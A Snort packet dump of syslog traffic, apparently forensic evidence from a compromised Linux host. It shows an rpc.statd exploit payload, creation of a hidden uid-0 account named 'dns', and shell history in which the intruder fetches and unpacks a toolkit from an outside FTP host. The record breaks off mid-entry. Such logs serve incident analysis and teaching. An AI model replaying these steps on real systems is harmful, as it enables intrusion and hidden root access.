Log directory = --== Initializing Snort ==-- TCPDUMP file reading mode. Reading network traffic from "scan19\slog2.log" file. snaplen = 1514 --== Initialization Complete ==-- 09/16-03:13:33.606399 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1467 IpLen:20 DgmLen:101 Len: 81 3C 39 34 3E 66 74 70 64 5B 35 30 37 34 5D 3A 20 <94>ftpd[5074]: 6C 6F 73 74 20 63 6F 6E 6E 65 63 74 69 6F 6E 20 lost connection 74 6F 20 41 43 38 38 31 37 41 34 2E 69 70 74 2E to AC8817A4.ipt. 61 6F 6C 2E 63 6F 6D 20 5B 31 37 32 2E 31 33 36 aol.com [172.136 2E 32 33 2E 31 36 34 5D 0A .23.164]. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-03:13:33.610924 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1468 IpLen:20 DgmLen:63 Len: 43 3C 39 34 3E 66 74 70 64 5B 35 30 37 34 5D 3A 20 <94>ftpd[5074]: 46 54 50 20 73 65 73 73 69 6F 6E 20 63 6C 6F 73 FTP session clos 65 64 0A ed. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-03:13:34.025412 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1469 IpLen:20 DgmLen:70 Len: 50 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 30 37 34 3A 20 65 78 69 74 20 73 pid 5074: exit s 74 61 74 75 73 20 32 35 35 0A tatus 255. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-03:13:44.461938 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1476 IpLen:20 DgmLen:101 Len: 81 3C 39 34 3E 66 74 70 64 5B 35 30 37 35 5D 3A 20 <94>ftpd[5075]: 6C 6F 73 74 20 63 6F 6E 6E 65 63 74 69 6F 6E 20 lost connection 74 6F 20 41 43 38 38 31 37 41 34 2E 69 70 74 2E to AC8817A4.ipt. 61 6F 6C 2E 63 6F 6D 20 5B 31 37 32 2E 31 33 36 aol.com [172.136 2E 32 33 2E 31 36 34 5D 0A .23.164]. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-03:13:44.464818 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1477 IpLen:20 DgmLen:63 Len: 43 3C 39 34 3E 66 74 70 64 5B 35 30 37 35 5D 3A 20 <94>ftpd[5075]: 46 54 50 20 73 65 73 73 69 6F 6E 20 63 6C 6F 73 FTP session clos 65 64 0A ed. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-03:13:44.482068 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1478 IpLen:20 DgmLen:70 Len: 50 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 30 37 35 3A 20 65 78 69 74 20 73 pid 5075: exit s 74 61 74 75 73 20 32 35 35 0A tatus 255. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-04:06:09.126655 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1481 IpLen:20 DgmLen:1039 Len: 1019 3C 31 37 33 3E 72 70 63 2E 73 74 61 74 64 5B 33 <173>rpc.statd[3 31 38 5D 3A 20 67 65 74 68 6F 73 74 62 79 6E 61 18]: gethostbyna 6D 65 20 65 72 72 6F 72 20 66 6F 72 20 5E 58 F7 me error for ^X. FF BF 5E 58 F7 FF BF 5E 5A F7 FF BF 5E 5A F7 FF ..^X...^Z...^Z.. BF 62 66 66 66 66 37 31 30 20 38 30 34 39 37 31 .bffff710 804971 30 39 30 39 30 39 30 39 30 36 38 37 34 36 35 36 0909090906874656 37 36 32 37 34 37 33 36 66 36 64 36 31 36 65 37 76274736f6d616e7 39 37 32 36 35 32 30 36 35 32 30 37 32 36 66 37 97265206520726f7 32 32 30 37 32 36 66 36 36 20 20 20 20 20 20 20 220726f66 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-08:03:00.695578 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1493 IpLen:20 DgmLen:71 Len: 51 3C 33 30 3E 74 65 6C 6E 65 74 64 5B 35 31 35 30 <30>telnetd[5150 5D 3A 20 74 74 6C 6F 6F 70 3A 20 70 65 65 72 20 ]: ttloop: peer 64 69 65 64 3A 20 45 4F 46 20 0A died: EOF . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-08:03:00.714116 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1495 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 31 35 30 3A 20 65 78 69 74 20 73 pid 5150: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-08:03:22.487883 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1516 IpLen:20 DgmLen:71 Len: 51 3C 33 30 3E 74 65 6C 6E 65 74 64 5B 35 31 35 31 <30>telnetd[5151 5D 3A 20 74 74 6C 6F 6F 70 3A 20 70 65 65 72 20 ]: ttloop: peer 64 69 65 64 3A 20 45 4F 46 20 0A died: EOF . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-08:03:22.650846 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1518 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 31 35 31 3A 20 65 78 69 74 20 73 pid 5151: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-21:24:36.913740 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1558 IpLen:20 DgmLen:71 Len: 51 3C 33 30 3E 74 65 6C 6E 65 74 64 5B 35 33 36 36 <30>telnetd[5366 5D 3A 20 74 74 6C 6F 6F 70 3A 20 70 65 65 72 20 ]: ttloop: peer 64 69 65 64 3A 20 45 4F 46 20 0A died: EOF . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-21:24:36.963226 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1560 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 33 36 36 3A 20 65 78 69 74 20 73 pid 5366: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:38:38.980689 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1561 IpLen:20 DgmLen:100 Len: 80 3C 37 37 3E 61 6E 61 63 72 6F 6E 5B 35 34 32 33 <77>anacron[5423 5D 3A 20 55 70 64 61 74 65 64 20 74 69 6D 65 73 ]: Updated times 74 61 6D 70 20 66 6F 72 20 6A 6F 62 20 60 63 72 tamp for job `cr 6F 6E 2E 64 61 69 6C 79 27 20 74 6F 20 32 30 30 on.daily' to 200 31 2D 30 39 2D 31 36 0A 1-09-16. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:53:05.761806 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1604 IpLen:20 DgmLen:89 Len: 69 3C 33 33 3E 50 41 4D 5F 70 77 64 62 5B 35 36 30 <33>PAM_pwdb[560 38 5D 3A 20 67 65 74 20 70 61 73 73 77 64 3B 20 8]: get passwd; 70 77 64 62 3A 20 72 65 71 75 65 73 74 20 6E 6F pwdb: request no 74 20 72 65 63 6F 67 6E 69 7A 65 64 0A t recognized. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:53:07.193248 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1605 IpLen:20 DgmLen:152 Len: 132 3C 33 37 3E 6C 6F 67 69 6E 5B 35 36 30 38 5D 3A <37>login[5608]: 20 46 41 49 4C 45 44 20 4C 4F 47 49 4E 20 31 20 FAILED LOGIN 1 46 52 4F 4D 20 32 31 37 2E 31 35 36 2E 39 33 2E FROM 217.156.93. 31 36 36 20 46 4F 52 20 6E 6F 62 6F 64 79 2C 20 166 FOR nobody, 41 75 74 68 65 6E 74 69 63 61 74 69 6F 6E 20 73 Authentication s 65 72 76 69 63 65 20 63 61 6E 6E 6F 74 20 72 65 ervice cannot re 74 72 69 65 76 65 20 61 75 74 68 65 6E 74 69 63 trieve authentic 61 74 69 6F 6E 20 69 6E 66 6F 2E 0A ation info.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:53:13.922816 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1621 IpLen:20 DgmLen:89 Len: 69 3C 33 33 3E 50 41 4D 5F 70 77 64 62 5B 35 36 30 <33>PAM_pwdb[560 38 5D 3A 20 67 65 74 20 70 61 73 73 77 64 3B 20 8]: get passwd; 70 77 64 62 3A 20 72 65 71 75 65 73 74 20 6E 6F pwdb: request no 74 20 72 65 63 6F 67 6E 69 7A 65 64 0A t recognized. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:53:15.002839 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1622 IpLen:20 DgmLen:152 Len: 132 3C 33 37 3E 6C 6F 67 69 6E 5B 35 36 30 38 5D 3A <37>login[5608]: 20 46 41 49 4C 45 44 20 4C 4F 47 49 4E 20 32 20 FAILED LOGIN 2 46 52 4F 4D 20 32 31 37 2E 31 35 36 2E 39 33 2E FROM 217.156.93. 31 36 36 20 46 4F 52 20 6E 6F 62 6F 64 79 2C 20 166 FOR nobody, 41 75 74 68 65 6E 74 69 63 61 74 69 6F 6E 20 73 Authentication s 65 72 76 69 63 65 20 63 61 6E 6E 6F 74 20 72 65 ervice cannot re 74 72 69 65 76 65 20 61 75 74 68 65 6E 74 69 63 trieve authentic 61 74 69 6F 6E 20 69 6E 66 6F 2E 0A ation info.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:54:00.794008 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1633 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 36 30 37 3A 20 65 78 69 74 20 73 pid 5607: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:55:52.196786 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1653 IpLen:20 DgmLen:111 Len: 91 3C 39 34 3E 66 74 70 64 5B 35 36 30 39 5D 3A 20 <94>ftpd[5609]: 41 4E 4F 4E 59 4D 4F 55 53 20 46 54 50 20 4C 4F ANONYMOUS FTP LO 47 49 4E 20 46 52 4F 4D 20 32 30 37 2E 33 35 2E GIN FROM 207.35. 32 35 31 2E 31 37 32 20 5B 32 30 37 2E 33 35 2E 251.172 [207.35. 32 35 31 2E 31 37 32 5D 2C 20 6D 6F 7A 69 6C 6C 251.172], mozill 61 40 0A a@. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:01:26.013852 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1808 IpLen:20 DgmLen:101 Len: 81 3C 37 37 3E 61 6E 61 63 72 6F 6E 5B 35 36 36 38 <77>anacron[5668 5D 3A 20 55 70 64 61 74 65 64 20 74 69 6D 65 73 ]: Updated times 74 61 6D 70 20 66 6F 72 20 6A 6F 62 20 60 63 72 tamp for job `cr 6F 6E 2E 77 65 65 6B 6C 79 27 20 74 6F 20 32 30 on.weekly' to 20 30 31 2D 30 39 2D 31 36 0A 01-09-16. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:13:35.505627 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1840 IpLen:20 DgmLen:98 Len: 78 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 30 <38>PAM_pwdb[860 38 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 8]: (login) sess 69 6F 6E 20 6F 70 65 6E 65 64 20 66 6F 72 20 75 ion opened for u 73 65 72 20 6E 6F 62 6F 64 79 20 62 79 20 28 75 ser nobody by (u 69 64 3D 30 29 0A id=0). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:13:50.550914 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1845 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 38 36 30 39 20 55 49 44 3D Y: PID=8609 UID= 39 39 20 77 0A 99 w. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:13:57.182169 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1850 IpLen:20 DgmLen:87 Len: 67 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 30 <38>PAM_pwdb[860 38 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 8]: (login) sess 69 6F 6E 20 63 6C 6F 73 65 64 20 66 6F 72 20 75 ion closed for u 73 65 72 20 6E 6F 62 6F 64 79 0A ser nobody. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:13:57.183211 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1851 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 30 37 3A 20 65 78 69 74 20 73 pid 8607: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:22:13.903878 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1861 IpLen:20 DgmLen:109 Len: 89 3C 33 38 3E 61 64 64 75 73 65 72 5B 38 36 33 32 <38>adduser[8632 5D 3A 20 6E 65 77 20 75 73 65 72 3A 20 6E 61 6D ]: new user: nam 65 3D 64 6E 73 2C 20 75 69 64 3D 30 2C 20 67 69 e=dns, uid=0, gi 64 3D 30 2C 20 68 6F 6D 65 3D 2F 62 69 6E 2C 20 d=0, home=/bin, 73 68 65 6C 6C 3D 2F 62 69 6E 2F 62 61 73 68 20 shell=/bin/bash 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:18.100236 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1906 IpLen:20 DgmLen:98 Len: 78 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 34 <38>PAM_pwdb[864 35 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 5]: (login) sess 69 6F 6E 20 6F 70 65 6E 65 64 20 66 6F 72 20 75 ion opened for u 73 65 72 20 6E 6F 62 6F 64 79 20 62 79 20 28 75 ser nobody by (u 69 64 3D 30 29 0A id=0). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:28.285384 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1916 IpLen:20 DgmLen:70 Len: 50 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 38 36 34 36 20 55 49 44 3D Y: PID=8646 UID= 39 39 20 73 75 20 64 6E 73 0A 99 su dns. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:29.073220 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1917 IpLen:20 DgmLen:99 Len: 79 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 36 <38>PAM_pwdb[866 31 5D 3A 20 28 73 75 29 20 73 65 73 73 69 6F 6E 1]: (su) session 20 6F 70 65 6E 65 64 20 66 6F 72 20 75 73 65 72 opened for user 20 64 6E 73 20 62 79 20 6E 6F 62 6F 64 79 28 75 dns by nobody(u 69 64 3D 39 39 29 0A id=99). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:34.929713 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1922 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 77 0A =0 w. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:48.752303 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1943 IpLen:20 DgmLen:71 Len: 51 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 63 64 20 2F 74 6D 70 0A =0 cd /tmp. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:51.200774 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1950 IpLen:20 DgmLen:69 Len: 49 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 6D 63 20 2D 73 0A =0 mc -s. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:33:06.534390 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1990 IpLen:20 DgmLen:74 Len: 54 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 63 64 20 2F 64 65 76 2F 72 64 0A =0 cd /dev/rd. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:41:05.284994 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2020 IpLen:20 DgmLen:82 Len: 62 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 66 74 70 20 74 65 6C 65 70 6F 72 74 2E =0 ftp teleport. 67 6F 2E 72 6F 0A go.ro. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:41:21.738739 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2044 IpLen:20 DgmLen:74 Len: 54 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 6D 6B 64 69 72 20 73 64 63 30 0A =0 mkdir sdc0. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:41:27.939131 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2054 IpLen:20 DgmLen:71 Len: 51 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 63 64 20 73 64 63 30 0A =0 cd sdc0. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:41:29.834834 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2058 IpLen:20 DgmLen:66 Len: 46 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 6C 73 0A =0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:41:33.882770 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2067 IpLen:20 DgmLen:82 Len: 62 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 66 74 70 20 74 65 6C 65 70 6F 72 74 2E =0 ftp teleport. 67 6F 2E 72 6F 0A go.ro. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:43:12.285808 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2369 IpLen:20 DgmLen:85 Len: 65 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 74 61 72 20 7A 78 76 66 20 5A 65 72 30 =0 tar zxvf Zer0 2E 74 61 72 2E 67 7A 20 0A .tar.gz . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:43:21.966675 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2388 IpLen:20 DgmLen:72 Len: 52 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 63 64 20 5A 65 72 30 2F 0A =0 cd Zer0/. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:43:23.826087 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2393 IpLen:20 DgmLen:66 Len: 46 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 6C 73 0A =0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.108872 